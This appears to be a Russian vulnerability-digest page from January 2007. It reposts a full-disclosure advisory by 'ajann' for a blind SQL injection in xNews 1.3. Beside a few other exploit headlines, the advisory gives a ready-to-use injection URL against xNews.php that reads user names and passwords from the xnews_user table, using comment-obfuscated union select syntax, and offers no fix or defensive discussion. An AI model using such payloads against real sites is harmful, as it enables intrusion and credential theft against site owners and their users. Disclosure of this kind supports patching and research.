Дополнительная информация

Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

[Full-disclosure] CVSTrac 2.0.0 Denial of Service (DoS) vulnerability

MyPHPcommander 2.0 (package. php) Remote File Include Vulnerability

AINS 0.02b (ains_main.php ains_path) Remote File Include Vulnerability

Xt-Stats v.2.4.0.b3 (server_base_dir) Remote File Include Vulnerability

From:	ajannhwt_(at)_hotmail.com <ajannhwt_(at)_hotmail.com>
Date:	29 января 2007 г.
Subject:	xNews 1.3 (xNews.php) Remote Blind SQL Injection Vulnerability

*******************************************************************************
# Title   :  xNews 1.3 (xNews.php) Remote Blind SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.x-dev.de
# $$      :  Free

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//xNews.php?act=shownews&id=[SQL]

Example:

//xNews.php?act=shownews&id=-1/**/union/**/select/**/0,1,
concat(user_name,char(32),user_pass),3,4,5,
6/**/from/**/xnews_user/**/where/**/id%20like%201/*

[[/SQL]]

""""""""""""""
"""""""
# ajann,Turkey
# ...

# Im not Hacker!